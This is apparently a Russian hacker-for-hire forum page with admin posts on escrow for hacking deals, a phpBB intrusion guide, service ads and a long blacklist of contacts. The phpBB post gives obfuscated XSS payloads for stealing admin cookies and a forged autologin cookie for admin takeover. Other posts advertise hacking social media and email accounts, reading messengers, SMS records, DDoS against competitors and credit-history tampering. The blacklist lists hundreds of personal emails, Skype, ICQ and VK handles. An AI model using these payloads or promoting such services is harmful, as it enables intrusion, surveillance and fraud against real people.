Перейти к содержимому


Самый популярный контент


#42 Реклама на форуме.

Написано Admin : 24 Ноябрь 2015 - 04:27

Информация рекламнадателям!
Если вы решили разместить рекламу на нашем форуме в виде Банера на всех страницах форума, либо пометить ваше объявление как "Важное" и так далее,

просьба обращаться на почту:
XpRu@protonmail.com

Прикрепленные изображения

  • image-2.jpg
  • image-1.jpg
  • image-3.jpg
  • image.jpg



#246 Как провести безопасную сделку?

Написано Admin : 28 Февраль 2016 - 08:42

s1ojKdKrVa0.jpg



498186ab30e0.png

Приветствую, дорогие посетители и пользователи форума, в связи с последними событиями и многочисленным кидаловом людей, мы решили вести прямую борьбу с этим беспределом и создали открытый сервис как для клиентов так и для специалистов.

Кому будет интересна безопасная сделка и в чем ее гарантии?
Тут все просто, Вы заказчик, не можете доверить сумму исполнителю и хотите работать без предоплаты, в свою очередь исполнитель тоже тратит средства на работу и не может быть уверен в Вашей стороне и по любым другим причинам не хочет выполнять заказ без платежа.
Лучший выход тут - безопасная сделка.90% возврата и выплаты средств любой стороне.

Преимущества сделки в том, что ни администратор, ни заказчик, ни исполнитель не смогут внести никаких поправок в сделку, все предельно честно, если работа не выполнена - средства на возврат, если выполнена - средства на выплату.
Схема работы: Заказчик ----> создание личного сообщения администратору-----> оплата в фонд форума ------> получение результата
Исполнитель -----> подтверждение в теме (которая будет создана администратором для сделки) ------> выполнение работы ------> получение средств.
МЫ НЕ ЯВЛЯЕМСЯ ГАРАНТОМ!!! Гарант - это схема не совсем честная, будьте бдительны!
Основные правила:

1. Сделку может провести абсолютно любой желающий пользователь и гость форума.

2. Все сделки и договоренности заключаются напрямую с исполнителем и клиентом, без участия третьей стороны, при условии открытии сделки на общее обозрение команде и пользователям форума
(по желанию заказчика соответственно).

3. Клиент и исполнитель обязаны действовать строго по заявке (см. ниже)

Заказчик или исполнитель создает сообщение администратору сайта с названием сделки например:

Тема: Взлом вконтакте
Текст: Совершаю сделку с пользователем admin (указывает ник исполнителя) , по услуге взлома вконтакте (описываете суть сделки), с правилами форума ознакомлен и согласен. Комиссию в фонд форума оплачиваю я. Сумма сделки: 1 0000 рублей. Сроки работы : 2 дня. (Это пример!)


После второй оппонент сделки обязан отписаться, что принимает условия форума и подтверждает сделку.
Администратор подтверждает и одобряет сделку, сразу после оплаты суммы в фонд форума с комиссией. Сумма из фонда выплачивается исполнителю сразу, после Успешно выполненной работы.

4. Отвественность за сделку несет только сам заказчик и исполнитель, Администратор выполняет роль куратора сделки, но никаким образом не имеет к ней отношения.

5. Клиент либо исполнитель оплачивают единоразовый взнос в размере 10% за услуги безопасной сделки в фонд команды форума.

Наши гарантии :

1) Пройдена идентификация во всех платежных системах. (Webmoney, Yandex, QIWI, PM)
2) Чистая репутация с 2011 года, есть на всех закрытых площадках.
3) Принимаем оплату наличными и оплата любым удобным способом в платёжные системы.
4) Предоставим любые рекомендации нашей порядочности заинтересованным клиентам.

Запомните, мы отличаемся от гарантов, мы только курируем сделку,которая открыта всем оппонентам, благодаря этому, тут не может быть обмана, т.к все видят как завершилась сделка.

Ответы на вопросы:

1. Как заказать услуги хакера, чтобы меня не кинули?
- Создаете тему (сообщение Администратору) , по заявке написанной в верху данной темы, и ждете одобрение Администратора.
После того, как Администратор одобрил тему он вам предоставляет пароль от закрытой комнаты где и будет проходить сделка, находится там должны Администратор, вы и исполнитель. Оплачиваете взнос в фонд и исполнитель может начинать работать.
2.Может хакер как-то кинуть меня или обмануть через данную систему?
-Нет, ни Вы, ни хакер не смогут нарушить условия честной сделки, для этого любая сделка открыта для общего просмотра (На усмотрение клиента!) и ее курирует Администратор.
3. Что значит сделка открыта? Все смогут наблюдать каков мой заказ?
-Сделка открыта для большинства людей (рекомендуем закрытые комнаты), но всю приватную информацию (ссылку на анкету, сайт, почту и пр) видите только, Вы и хакер.
4. Для чего сделали открытые сделки?
- Для того, чтобы большинство людей видели как работает наша команда и борется с кидаловом. Открытые сделки помогают сохранить чистоту процесса и большинству пользователей подобрать нужного кандидата сделав вывод по его закрытым сделкам.
5. Что значит открытая и закрытая сделка?
- Открытая сделка - это когда вы дали заявку на работу и исполнитель ее подтвердил, но она еще в стадии выполнения. Закрытая сделка - это когда исполнитель выполнил работу и вы ее приняли без претензий.
Закрытые комнаты для сделок это отдельный форум где происходят сделки под контролем Администрации сайта. Другие пользователи не видят и не имеют доступа к вашему личному заказу (если для вас это важно)
6. Могу ли я приглашать исполнителей не являющимися пользователями вашего форума?
- Да, мы только приветствуем такого рода решения.
7. Каким образом я могу сделать оплату в фонд форума?
- Мы принимаем любой удобный для вас способ оплаты.
8. Я должен оплатить сумму работы вам? Чем вы отличаетесь от гаранта?
- Верно, вы оплачиваете сумму работы в фонд форума, что является гарантией для исполнителя,что вы платежеспособный клиент. Для вас гарантия в том, что сможете забрать средства в любой момент, так же исполнитель не получит средства до окончания работы и вашего согласия. Сумма в полном размере передается исполнителю, ТОЛЬКО ПОСЛЕ ЗАВЕРШЕНИЯ РАБОТЫ.
Наше отличие от гаранта в том, что мы открываем сделки для просмотра, по желанию заказчика, чтобы пользователи не сомневались в безопасности и знали, что в любой момент могут прекратить сделку и вернуть свои средства.


P.S Перевод на банковскую карту,осуществляется по запросу заказчика - Основателю форума,Через ЛС Возврат денежных средств осуществляется только по заявке заказчика, и переводится только на те реквизиты с которых производилась оплата!
Срок возврата осуществляется в течении 3-5 часов,с момента подачи заявки!
Подать заявку на сделку через гарант вы можете по этой ссылке:
https://xakerpro.ru/...romMemberID=133

s1ojKdKrVa0.jpg



498186ab30e0.png




#14 phpBB

Написано Admin : 23 Ноябрь 2015 - 11:11

1) Хочу понять, как же взламываются форумы phpbb.
 
Их можно взломать 5 способами:
1) Через уязвимость highlight. Дает исполнение команд на сервере. Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
2) Получить доступ к аккаунту администратора.
3) Через уязвимость в профайле signature_bbcode_uid Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
4) Взлом через моды.
5) Взлом через sql инъекцию.
2) Как получить аккаунт администратора на форуме?
 
1) Угадать, украсть, спросить.
2) XSS - позволяет украсть куки администратора и под ним зайти на форум. В версиях >2.0.19 нельзя войти в админку незная пароля.
xss для форума phpbb. Почти все найдены White Jordan.
[c*olor*=#EFE*FEF][forbidden link][/UR*L]  phpbb 2.0.17 Рушиться структура, код надо доработать[im*g]http://ww*w.phpbb.com/xx[em*ail]xx@*xx.com[/ema*il]images/p*hplogo.gif[/i*mg] [*url]ww*w.ut[forbidden link][/u*rl]' [*url=http://www.%*5burl=http://xx.com/style=display:no*ne;backgrou*nd#58;url(javascript: alert()&+#41; %5*dxx*]http://www.<a href="http://xx.com/style=displa...) " target="_*blank*">xx[/url]
 
пихаем все эти коды в сообщение, на сниффере ловим куки, подставляем их, и мы админы.
 
3) Получение админского аккаунта через багу в куках.
phpbbmysql_data:a%3A2%3A%7Bs%3A11%3A%22autologinid %22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222% 22%3B%7D
 
И мы становимся админом (если форум не пропатчен).
3) Как происходит взлом?
1) Просмотр версии форума. Она определяется заходом по ссылке http://site.ru/forum.../CHANGELOG.html
Смотрим какая там последняя версия и прибавляем единицу.
2) Проверку на уязвимость форума к багам highlight, админским кукам, signature_bbcode_uid.
Если сработало, иди в раздел "Заливка шелла в phpbb". Если не сработало.
3) Проверяем форум на sql уязвимости.
Делаем запросы:
Если сработало, то добываем хеш админа, расшифровываем.
4) Если ничего не помогло, теперь надо проверить форум на дырки в модах.
запросы:
Запросы для получение привилегий найдете на секьюрити порталах.
5) Взлом через xss.
 
4) Как узнать серверный путь форума?
http://site.ru/forum...erlist.php?mode[]=cx + дает возможно узнать префикс таблиц базы данных
 
Пути для форумов <2.0.10
5) Как узнать префикс таблиц базы данных?



#342 Услуги профессиональных хакеров.

Написано Admin : 04 Май 2016 - 11:07

УСЛУГИ ПРОФЕССИОНАЛЬНЫХ ХАКЕРОВ.
Рад приветствовать каждого пользователя который перешел на XAKERPRO.RU Сегодня решил обсудить по-видимому достаточно популярную тему. В которой будем вести обсуждение хакеров и услуги которе они предоставляют. Большая часть сюда перешли в надежде найти специалиста который оказал бы подобные услуги! Я уверен если вы по юзаете мой форум обязательно найдете такого человека. Мир в котором интернет технологии развиваются с бешеной скоростью услуги подобного рода имеют большую актуальность. Практически 70% современного бизнеса услуг связанно с рекламой в глобальной сети.Конкуренция между бизнесменами растет буквально по часам, многие желают применить хитрости и обратиться за помощью к специалистам.Даже пренебрегая законодательством Российской Федерации, давайте рассмотрим основные услуги этого рынка: Блокировка доменных имен: Зачастую возможная конкуренция разворачивается между сайтами. Которые пытаются вылезти в топовые позиции поисковых систем.Пренебрегая рядом фактором соперники готовы на любые шаги! Один из лучших вариантов заставить отступить своего оппонента. Заблокировать домен его сайта, во-первых это отразится на всей СЕО компании примененной к сайту! Во-вторых, подобные действия испугают вашего врага от подобных посягательств на клиентов. ДДос атаки: Еще один вариант опустить конкурента с небес на землю, обращаясь к хакеру за услугами досс. Вы гарантированно получаете временное отсутствие потенциального недруга в сети. Преобладая в поиске в это время.Отметим заблокировать домен выйдет достаточно дешевле чем, постоянно пользоваться досс атаками.Удаление негатива: За годы работы в сфере хакинга, ко мне обращались различные люди с различными проблемами. Частенько были соотечественницы жившие в Европе или Соединённых Штатах Америки. Засветившиеся на порталах связанных с порнографией. Приходилось удалять всю информацию, которую оставляли бывшие работодатели девушек.Личности с просьбой удалить фейковый аккаунт в tweetr и других социальных сетях. Подобные услуги хакеров стоят достаточно хорошо, и многим увы не по карману.Удаления негативно содержащего видео на youtube, администрации лояльно относится к видеозаписям содержащим информацию о какой-либо личности. Вспоминаются на моей памяти и негативные клиенты! Помните по всей стране ходили видео с большим накаченным скинхедом по имени ТЕСАК? Занимался он ловлей педофилов на живца, после чего избивал недолюдей и выкладывал запись в всемирную паутину.За лето когда этот парень проявлял максимальную активность ко мне обратились десятки педофилов с просьбой удалить и заблокировать аккаунт. Сейчас я подобным вещами не занимаюсь, скажу откровенно я их обманывал! Удалял запись, получал оплату сразу же восстанавливал!Считая действия этих людей аморальными, думаю я имел на это полное право и гражданскую позицию!Удаление отзывов:Пакости ненавистников и конкурентов, оставляют негативную информации о честных людях в интернете!Найти проверенного хакера который произвел удаления подобных тем достаточно тяжело. Необходим специалист оказывающий услуги не первый год своим клиентам. Представьте обыкновенный риэлтер, честный оказывающий не дорогие услуги. В общем пользующейся спросом знаток своего дела. Создается простая тема на форуме, и начинаются зарисовки негативных отзывов. Мол дилетант, обманул меня на кругленькую сумму! Если завистник вашей популярности заходит достаточно далеко, таких сообщений может быть очень много! Когда тема появляется в индексе сделать практически не чего нельзя. Особенно когда администрация форума не активна или принципиальна!Приходится пользоваться услугами специалистов, в данном случае хакеров. Платить деньги не понятно за что! Взлом социальных сетей: Нанять хакеры для взлома вконтакте или одноклассников, рядовое занятие! Тысячи людей пытаются сделать это ежедневно.Проверить любимую девушку на верность, или с кем общается ваш парень обыдённые причины обращения к программистам самоучкам.Читать мессенеджеры сообщений:Смартфоны, определить место расположение и многое другое. Все это под силу сделать обыкновенному взломщику. Вибер и whatsapp, стремительно завоевывают место подобных приложений в нашем обществе. Судя по росту выходит достаточно удачно! Русский человек от природы любит халяву, вибер и есть бесплатный вариант отправлять сообщения пользователям по всему миру! Как правильно заказать услуги у хакеров:Все большую актуальность подобные услуги взлома обретают у человечества в целом. Многие понимая этот факт, но не имея возможность предоставить их! Становятся мошенниками, обманывающими рядовых граждан.Расскажу принцип работы с хакерами без обмана:
№1. Обращайте внимание на опыт работы этого человека, если по каким либо причинам у вас хакер требует оплату в перед, это совсем не означает что он мошенники, сейчас многие работают по предоплате. Почему объяснять здесь не могу, спросите у тех кто предлагает услуги и если ответ вам покажется адекватным то и развернутым вы всё поймете. Если же начинаются отговорки не дающие нормального ответа на вопрос, то советуем предложить работу через гаранта.
№2. Предлагайте работать через гарант сервис, работая через гарантов у вас будет возможность получить услуги которые вы заказывали!Честный и профессиональный гарант стоит достаточно не дорого. Порядка 7% от суммы сделки.Если исполнитель согласился работать через гаранта это уже характеризует его с положительной стороны.
№3 Как правило, старайтесь просить предоставить доказательства выполненной работы, только после этого следует уведомить гаранта о завершении сделки!

Прикрепленные изображения

  • 8f718ec85c8d2b0f45effbfb13a458ac.png



#344 Черный список.

Написано Admin : 04 Май 2016 - 12:02

Доброго времени суток уважаемые гости и друзья форума опытных хакеров! Сегодня я хочу предложить список самых популярных кидал в сфере взлома на заказ. Если вас обманули, пиши контакты хакера в теме!!!!! Сортировка по email: 122115@mail.ru 21216@mail.ru 3lom4ik@mail.ru 2512888@mail.ru 6576432@gmail.com 923667@gmail.com 979365@gmail.com acab@crimeon.com admin@crimeon.com aooyes.com akk.info.com@gmail.com alaridsusan@yandex.ru aleksandr_hak@inbox.ru aleksandrturop@gmail.com algonco.com andrey.savelin@mail.ru andrey_fofanov@bk.ru ngelskaya@mail.ru Anjelina_kr@list.ru anjelina-kr@yandex.ru anonim@hacksystem.ru aanonim.kiber.com@gmail.com antiemail@eml.cc anton1985v@mail.ru arslan011212@mail.ru artem.6508@mail.ru artem.andreev2014@yandex.ru vkeypro@mail.ru vlad.vz@mail.ru vlechenko97@mail.ru VP770066@email.ru vz-vk@list.ru vzll.pochta@gmail.com vzlom@hackerku.net vzlom@live.com vzlom64bit@gmail.com vzlom_vzlom86@mail.ru vzlom-odnoklassnikov.net vzlom.alexei@gmail.com vzlom.life@gmail.com vzlom.nazakaz@yandex.ru vzlom.profi@gmail.com vzlom.service@gmail.com vzlom.sistema.dos@gmail.com vzlom.soc@gmail.com vzlom.na.zakaz@gmail.com vzlom-voronin@mail.ru vzlom.vzlom.vzlom@gmail.com vzlom.x.com@gmail.com vzlom-anket@yandex.ru vzlom-na-zakaz.com vzlom-xakk@yandex.ru vzlom64bit@gmail.com vzlomaem.com@gmail.com vzlomai@outlook.com vzlomal82@gmail.com vzlomnikita@mail.ru vzlomov.ru@mail.ru vzlomPro@live.ru vzlomseti@gmail.com vzlomseti.my1.ru vzlomvkontakte.net vzlomvkontakte3@gmail.com vzlomzona.narod.ru vzlomzona@gmail.com w.hanter@outlook.com welcometousluga@gmail.com www.dosug@gmail.com x4000800@gmail.com xak.pass@bk.ru xak16@bk.ru xakep-1989@ya.ru xaker3902@gmail.com xaker.brut@gmail.com xakep.ing@gmail.com xaker.klub@yahoo.com xakep.ok@bk.ru xakker@outlook.com xspiriton@yahoo.com xsslook@outlook.com z.vzloma@yandex.ru zakaz.com@mail.ru zakaz.na.vzlom@yandex.ru zakaz.v.net@yandex.ru zakaz.vzloma.84@gmail.com zakaz-email@xakep.ru zakaz-vzloma@hack-pass.com zakaz-vzloma.net zakaz-vzloma@inbox.ru zakaz-vzloma-vk@hotmail.com zakazvzloma.com zakazemail@yandex.ru zevskom@yandex.ru zharikov.petechka@mail.ru zonavzlom@yandex.ru asc@mail.ru aypro@list.ru barnyhack@yahoo.com bedoev.artem@mail.ru bondar_andreyy@ro.ru breaking_91@mail.ru bronny@xaker.ru brytto_joker@bk.ru bunker001hackers@gmail.com bypassxx@gmail.com chaiko.11@mail.ru carina.hack@yandex.ru chestnyihaker@mail.ru ck94@bk.ru ck094@yandex.ru cool.amo2010@yandex.ru corp@eml.cc crackpas@gmail.com darkman_nv@mail.ru darth.venom1@rambler.ru davzlom@mail.ru ddos.hackerr@gmail.com defix@bk.ru dekoff.i@yandex.ru den-hacker@bk.ru dima-po-vzlomy@yandex.ru dimon.d.a.joper@mail.ru dmilat75@mail.ru doctor-info@mail.ru dostrova@inbox.ru dr.clows@yandex.ru dron.anonim@mail.ru ehacking@mail.ru egor.preobrajenski@gmail.com ehacking@outlook.com engineengs@gmail.com enjoy.prohacking@gmail.com evgeniy-kovalev1994@mail.ru ex8pert@mail.ru expert@ojooo.eu fenix592@gmail.com fenix592@rambler.ru festaxoff.valera@yandex.ru forum-hackeroff.ru garantprohack@gmail.com georg.iprof@yandex.ru gfdtk-8d@bk.ru gohackpro@gmail.com good-b2b@mail.ru good-hack@yandex.ru grandsioz@yandex.ru grinA@gmail.ru grinahack.ru grinahelp@ukr.net grinahelp@gmail.com gvlechenko@bk.ru gvlechenko@mail.ru hack-pass.com hack-pass@bk.ru hack-vk.com@bk.ru hack.haman@gmail.com hack.lebedev@yandex.ru hack.log.and.pass@gmail.com hack.portal@yandex.ru hacker.80@yandex.ru hacker.email@yandex.ru haker.maksimka@mail.ru haker089@yandex.ru hakerok.86@gmail.com hackerproff.fast@gmail.com hackerpromail@gmail.com hackers.2006-2012@yandex.ru hackers_2014@yahoo.com hackharlem@gmail.com hackinghelp@yandex.ru hackmarke@yahoo.com hackmidle@gmail.com hacks-all@yandex.ru hakedmaster@gmail.com hakervzom@gmail.com HaksOpen@gmail.com hank.luk@gmail.com HardBass09.p.ht High.Quality.Hacking@yandex.ru high-quality-hacking@yandex.ru icexakep2013@yandex.ru info-07@mail.ru installWorld@yandex.ru ithackexpert@gmail.com JABBER: w.hanter@jabber.org jackhelp@hotmail.ru jackhelp@yahoo.com jaovs1@yandex.ru kaisa59@rambler.ru kay@eml.cc kc1hacker@gmail.com kirillpetrenko@ymail.com kodq@fromru.com kornilov-hack@ya.ru kornilov-hack@yandex.ru korrnev.aleksandr@gmail.com KozaNostra777@hotmail.com krystiza@mail.ru krollik@bk.ru kukla1393@mail.ru kurbanov.hack@yandex.ru kurbanov-hack@ya.ru labin.oleg@yandex.ru lamer.vzlom@gmail.com lazykent91@gmail.com lekomtsev_r@mail.ru lenya.demchenko@mail.ru line-box@mail.ru lamer1221@ya.ru Lnchshij3@yandex.ru lomaemmilo@mail.ru lommila@mail.ru mail–miedkov89@mail.ru mail.boss7@gmail.com mail.crack@yandex.ru mail.crack.ru@yandex.ru mail_crack@rocketmail.com mails-open@yandex.ru mails.passw@gmail.com MailsWizard@gmail.com makarov.hack@yahoo.com mastxack@gmail.com motherfuker1337@yandex.ru mazahacka.ru@mail.ru mega-hack87@mail.ru mega_volt_hack@yahoo.com mi1anchik@yandex.ru miedkov89@mail.ru misha.uslugi.vzloma@gmail.com moikontakty.narod.ru molhan@inbox.ru moon.anneta@mail.ru mr.white.goodhacker@gmail.com motherfuker1337@yandex.ru ness@xaker.ru nadtoka.hakcer2010@yandex.ru nikita-popov93@yandex.ru nindeti@mail.ru olgavzlom@rambler.ru orpbox@mail.ru onhack@live.ru online.hackvzlom@gmail.com pas.s.fes@gmail.com pass.vxl@gmail.com passkey14@mail.ru passv.xl@gmail.com pass-2015@yandex.ru passfes@gmail.com Pavel.Hakk@mail.ru Pavel.Hakk@yandex.ru Pavel.Hakk@gmail.com petrikov-1989@inbox.ru petrulip1@mail.ru petrulip2@mail.ru pet1482@yandex.ru pochta809@bk.ru pochtallx@mail.ru pogdevelopers@gmail.com pomoguvzlomat@gmail.com povel1988@mail.ru powerofhack@yahoo.com pro.haker@bk.ru pro.vzlom@bk.ru pro.vzlom.profil@gmail.com PROFIvzlom@ya.ru professional@programist.ru proffi_vzlom@bk.ru progproff@yandex.ru promaster499@gmail.com promhack@ymail.com pros89@bk.ru prospeedhack@gmail.com provzlom@live.ru provz1om@yandex.ru Pro-vzloma@yandex.ru pro-vzloma2009@ya.ru rack.sascha2016@yandex.ru rad4uk@yahoo.com radchuk-it@mail.ru rich.hacker2014@yandex.ru robin.pass@ymail.com romantsev.eduard@mail.ru roma.starkov.88@mail.ru roman.dudarew12@yandex.ru ruhak@xaker.ru RussianHackService@yandex.ru saita.moderator@yandex.ru satoret@yandex.ru sgegory@ymail.com servis@programist.ru shellhacker78@gmail.com sidr.nikolay@mail.ru siti.scan@mail.ru slava.hax@yandex.ru slomaem@xaker.ru sochelper01@gmail.com solovev.vasyusha@inbox.ru spyhacker@mail.ru stepan.vzlom@yandex.ru super.hackzone@yandex.ru support@hackergate.net tdssdos@gmail.com tolikzakharov@yandex.ua ttomik01@gmail.com unknow.xakep@yandex.ru uslugavk@yandex.ru uslugi.po.vzlomu@yandex.ru uslugi-hackera@rambler.ru uslugi-vzlom@mail.ru uslugivzloma@yandex.ru v-hack@mail.ru vashurkin2012@gmail.com vasya2010z@mail.ru vavasik90@mail.ru vippomoch@xaker.ru vk-od@rambler.ru Сортировка по Skype: abra-kadabra67 abrcadabr67 brytto_joker de7phi good-hack HaksOpen haker20151 KENIROKEN kioto9112 MailsWizard marina_ernest miedkov89 Nikita-popov93 nindeti Skype Pavel_Hakk powerofhack shOrtle shket30144 tx4hack vasya2010z vzlom_hack vzlom.on@yandex.ru vzlom2012 xakermen.xakermen skype@hacksystem.ru Сортировка по icq: 111-111-463 180-220 197-79-33 217-627 220-772 222-84-82 276-71-73 318-319 354-599-095 379-892 403-99-00 465-229-798 474-622-857 479-614 551-837 555-333-777 561-658-721 564-455-785 576-432 576-99-00 577-668-445 589-999-71 602-374-488 603-403-038 605-349-067 605-511-466 611-926-090 615–942-753 616-963-483 617-985-842 623-478-760 633-133-323 633-376-723 633-684-500 649-008-31 650-952-099 654-547-171 655-534-448 656-955-368 657-964-762 667-038-788 675-608-888 677-000-002 681-355-178 681-813-681 684-801-171 688-023-196 692-753-919 696-213-359 943-494-60 996-032 998-98-98 Сортировка по вконтакте: vk.com/id231591923 vk.com/id250053527 vk.com/id126683114 vk.com/id86157862 vk.com/id126683114 vk.com/id226365874 vk.com/id312650110 vk.com/id329445437 vk.com/id38168233 vk.com/ck944 vk.com/dyhaa vk.com/grinahack vk.com/hak.pro81 vk.com/hakervzlom2015 vk.com/lisaveta7 vk.com/mskk2 vk.com/powerofhack vk.com/giprof vk.com/vladimirfedorov88

stanislavpacker@hotmail.com

 

Если вы нашли хакера к которуму хотели обратиться в этом списке советуем вам предостерегаться! Соблюдайте правила! №1. ПОЛЬЗУЙТЕСЬ ГАРАНТОМ! И ЧИТАЙТЕ XAKERPRO.RU (ФОРУМ ХАКЕРОВ И ПРОГРАММИСТОВ)

Прикрепленные изображения

  • 1450969123.jpg



#141 УСЛУГИ ВЗЛОМА СТРАНИЦ ПОЧТЫ И ДЕТАЛИЗАЦИЯ СМС. ОПЫТ РАБОТЫ, РАЗУМНЫЕ ЦЕНЫ.

Написано PLAY : 15 Февраль 2016 - 10:20

Приветствую вас Уважаемые клиенты.
Предлагаю услуги взлома страниц, социальных сетей,таких как:
Одноклассники, Vk.com, Facebook и др.
Взлом почты любых почтовых серверов, таких как:
Яндекс (Yandex), Гугл (google),
Mail.ru он же (Мой мир), Рамблер (rambler) и др.
А также выполняю детализацию смс мобильного
любых операторов сотовой связи,
детализация Skype, Viber, WhatsApp и другие.
Быстро качественно, надежно.
Опыт работы с 2009года,
работаю по сегодняшний день и не собираюсь прекращать.
Разумные цены на услуги, опыт. Обращайтесь.

КОНТАКТНЫЕ ДАННЫЕ

Почта:√
XakerPLay@ya.ru


Страница в одноклассниках:√
http://ok.ru/profile/568832266715


Сайт:
http://xaker.forum-top.ru





ВНИМАНИЕ!
УВАЖАЕМЫЕ ПОЛЬЗОВАТЕЛИ
УБЕДИТЕЛЬНО ПРОСИМ ВАС.
ОБРАЩАТЬСЯ. НЕПОСРЕДСТВЕННО
ПО ТЕМ КОНТАКТНЫМ ДАННЫМ,
КОТОРЫЕ. МЫ УКАЗАЛИ ВЫШЕ,
В ОПИСАНИИ ТЕМЫ!
В случае если вы обращайтесь по контактным данным, которые оставил кто-то другой в комментариях, вы рискуете стать жертвой мошенников, мы не несем ответственности за это. Будьте внимательны!

Прикрепленные изображения

  • 1461058277610.jpg



#930 Партнеры по продвижению.

Написано Admin : 04 Июль 2016 - 08:33

Доброго времени суток уважаемые пользователи и гости.
Форум хакеров приветствует вас.
Хотелось бы поблагодарить наших партнеров, которые трудятся во благо форума на разных площадках интернета, российские сайты и не только. Сегодня выложу ссылки на страницы и группы на зарубежных площадках, таких как:
http://fb.com

http://plus.google.com

http://twiter.com

В дальнейшем пополним базу и российскими ссылками на страницы и группы которые созданы для развития форума.

Прикрепленные изображения

  • top-5-haker-programm.jpg



#418 форум-хакеров.рф В черном списке, обман пользователей

Написано Admin : 29 Май 2016 - 02:52

Доброго времени суток, приветствую вас снова на форуме хакеров.
XAKERPRO.RU
Пишу по теме, прошло два дня и администратор все-таки ответил нашей Natali777 на сайте форум-хакеров.рф
Наша страница Natali777 как вы помните, просила проверить наш новый почтовый ящик-'соответственно админ не знает что ящик наш' на то можно ли ему доверять, как я и ожидал, администратор добавил нашу тему в разделе 'проверка хакеров и сервисов в интернете' на их форуме.
Наш новый почтовый ящик, который не где не фигурирует,
(вообще нигде так как он совершенно новый) оказался по их мнению мошенником, которому верить нельзя)))

можете зайти посмотреть, вот ссылка:
http://форум-хакеров...go7gooyandexru/

Для тех кто не читал тему разоблачения их форума, не поймет.
Прошу тех, кто не читал описание этой темы, вначале прочесть описание и тогда Вам всё станет ясно.
Выкладываю ссылки и скрины, чтоб всё было максимально открыто.
Вообщем таким образом форум хакеров рф занял свое место в нашем разделе черного списка.
Заходите проверяйте сами, всё максимально открыто делаю, чтоб всем было видно, как они хитро вводят в заблуждение обыкновенных пользователей, дабы выставить свои услуги реально рабочими, а остальные услуги даже не проверяются ими и автоматически объявляются мошенниками))), повторюсь (просто выставить визуально свои услуги рабочими!!) их услуги также настроены на обман пользователей, как и их форум, будьте бдительны!!!
Спасибо за внимание, я надеюсь вам была полезна наша статья.
Профессиональные хакеры и опытные программисты, не важно форум это или просто человек который предлагает свои услуги взлома или хакера, никогда не будет без проверки называть того или иного мошенником, тем самым вводя пользователя в заблуждение, дабы обратились только к ним за помощью, будьте бдительны помощи вы от них не дождетесь, вас обманут будьте бдительны!!!

Кстати на почту Go7goo@ya.ru так и не поступило не каких писем с просьбой помочь хотя-бы, они ведь должны были от чего то отталкиваться, прежде чем называть новый совершенно (повторюсь) Новый ящик, который был создан 2 дня назад, как и регистрация Natali777, на их форуме и создана тема с просьбой проверки нашего же (ящика шпиона)))

Вывод http://форум-хакеров.рф ресурс мошенников

Спасибо за внимание.
Форум хакеров XAKERPRO.RU

Прикрепленные изображения

  • image.jpg



#27425 Заработок в интернете

Написано b1Squ1t : 09 Январь 2019 - 05:47

Как легко, получается создают фишинговый сайт (или как оно там) и просто ломают аккаунты? 

 

Да, этот называется фишинг. Согласно википедии:

 

Фишинг — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям. Это достигается путём проведения массовых рассылок электронных писем от имени популярных брендов, а также личных сообщений внутри различных сервисов, например, от имени банков или внутри социальных сетей. В письме часто содержится прямая ссылка на сайт, внешне неотличимый от настоящего, либо на сайт с редиректом. После того как пользователь попадает на поддельную страницу, мошенники пытаются различными психологическими приёмами побудить пользователя ввести на поддельной странице свои логин и пароль, которые он использует для доступа к определённому сайту, что позволяет мошенникам получить доступ к аккаунтами и банковским счетам.




#25309 Качество работы доставит вам удовольствие!

Написано byvaliy : 22 Март 2018 - 05:00

-------------------------------------Acount.attack.hakker@gmail.com-------------------------------------

                          Вы получите от нашего сервиса следующие услуги взлома на заказ:
 
- Быстрое выполнение заказа
- Качество работы доставит вам удовольствие
- Гарантируем конфиденциальность каждому клиенту


vk и ok
  Что вы получите от нашего сервиса, заказывая взлом вконтакте или одноклассники:
- Пароль и логин для входа без изменения (в единственном случае можем изменить, если об этом просит клиент)
- Повторный взлом бесплатно, если жертва поменяет пароль в течении месяца
- Доказательства - на ваш выбор
- Анонимность и качественное выполнение заказа
- Даем всю необходимую информацию для безопасного входа на страницу жертвы


Выполним для вас взлом: Instagram, Twitter, ICQ, Skype, Viber, Whatsapp (что не нашли - уточняйте)

Взломаем САЙТ конкурентов, удалим негативные ОТЗЫВЫ (фото, видео и не только), осуществляем взлом EMAIL

Если вам необходимо удалить отрицательную Кредитную Историю - это снова к Acount.attack.hakker@gmail.com. Мы можем почистить вашу БКИ, а также повысить скоринговый балл



║║ ─ ╔╗ ─ ║╔ ─ ╔═ ─ ╔╗
╠╣ ─ ╠╣ ─ ╠╣ ─ ╠═ ─ ╠╝
║║ ─ ║║ ─ ║╚ ─ ╚═ ─ ╠╗






Почему именно у Acount.attack.hakker@gmail.com стоит заказать взлом?
1) В нашем сервисе работают только профессионалы, которые сделают работу в срок
2) Выполняем срочные заказы
3) Заключаем сделки только через проверенный и надежный гарант сервис
4) Гарантируем анонимность и конфиденциальность каждому клиенту
5) Имеем свои профессиональные методы и приемы при выполнении заказов
6) Гарантируем качество работы
7) Даем консультации каждому клиенту и предоставляем подробную инструкцию по использованию определенных приложений

Получить всё это вы можете, обратившись по адресу Acount.attack.hakker@gmail.com!

--------------------------------------------------------------------------------------------------------



















-------------------------------------Acount.attack.hakkerСОБАКАgmail.com-------------------------------------

                          Вы получите от нашего сервиса следующие услуги взлома на заказ:
 
- Быстрое выполнение заказа
- Качество работы доставит вам удовольствие
- Гарантируем конфиденциальность каждому клиенту


vk и ok
  Что вы получите от нашего сервиса, заказывая взлом вконтакте или одноклассники:
- Пароль и логин для входа без изменения (в единственном случае можем изменить, если об этом просит клиент)
- Повторный взлом бесплатно, если жертва поменяет пароль в течении месяца
- Доказательства - на ваш выбор
- Анонимность и качественное выполнение заказа
- Даем всю необходимую информацию для безопасного входа на страницу жертвы


Выполним для вас взлом: Instagram, Twitter, ICQ, Skype, Viber, Whatsapp (что не нашли - уточняйте)

Взломаем САЙТ конкурентов, удалим негативные ОТЗЫВЫ (фото, видео и не только), осуществляем взлом EMAIL

Если вам необходимо удалить отрицательную Кредитную Историю - это снова к Acount.attack.hakkerСОБАКАgmail.com. Мы можем почистить вашу БКИ, а также повысить скоринговый балл



║║ ─ ╔╗ ─ ║╔ ─ ╔═ ─ ╔╗
╠╣ ─ ╠╣ ─ ╠╣ ─ ╠═ ─ ╠╝
